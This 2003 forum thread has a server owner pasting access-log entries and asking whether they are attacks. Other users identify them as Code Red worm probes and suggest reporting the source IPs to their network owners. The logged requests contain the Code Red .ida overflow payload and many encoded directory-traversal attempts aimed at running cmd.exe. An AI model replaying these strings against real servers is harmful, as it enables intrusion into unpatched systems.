Guest quakey Posted July 30, 2003 Report Share Posted July 30, 2003 Hi, Frequently I got the following lines in the access log: 68.165.217.90 - - [29/Jul/2003:20:43:09 -0700] "GET /default.ida?XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 209 "-" "-" 127.0.0.1 - - [29/Jul/2003:20:44:32 -0700] "GET / HTTP/1.0" 200 4944 "-" "mon.d/http.monitor" 68.165.90.188 - - [29/Jul/2003:20:44:57 -0700] "GET /default.ida?XXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 209 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:01 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:02 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:03 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:05 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:07 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:08 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:10 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:12 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:13 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:15 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:17 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:18 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:19 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:20 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-" 68.83.63.234 - - [29/Jul/2003:20:45:21 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-" What are those? ppl trying to hack my server? Thank you. Quote Link to comment Share on other sites More sharing options...
paul Posted July 30, 2003 Report Share Posted July 30, 2003 welcome to the club :roll: everybody gets those :roll: do you remember code red ??? the IIS and Personal Web Server worm? ... well thats what that is that you are seeing Quote Link to comment Share on other sites More sharing options...
tyme Posted July 30, 2003 Report Share Posted July 30, 2003 thankfully you have nothing to worry about! so just ignore it ;-) if the IP it's coming from is frequently the same, i would jump over to arin.net, do a whois on it, and send an email off to whomever the address block it's in belongs to (i would look for an abuse email address or possibly the tech email address). help stop the spread of the worm! :) Quote Link to comment Share on other sites More sharing options...
Guest anon Posted July 30, 2003 Report Share Posted July 30, 2003 Hey tyme, just had to scroll three miles to the right to read your post Quote Link to comment Share on other sites More sharing options...
tyme Posted July 30, 2003 Report Share Posted July 30, 2003 Hey tyme, just had to scroll three miles to the right to read your post not my fault! it was the length of the original post which caused the stretched box. but i dropped a return into my post so that people wouldn't have to scroll :) (or atleast not much...not sure if it renders much differently on my 1600x1200 screen as it would on smaller resolutions) Quote Link to comment Share on other sites More sharing options...
Guest anon Posted July 30, 2003 Report Share Posted July 30, 2003 Your right again tyme, sorry Edited the first post to make it shorter, now its only a one mile scroll. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.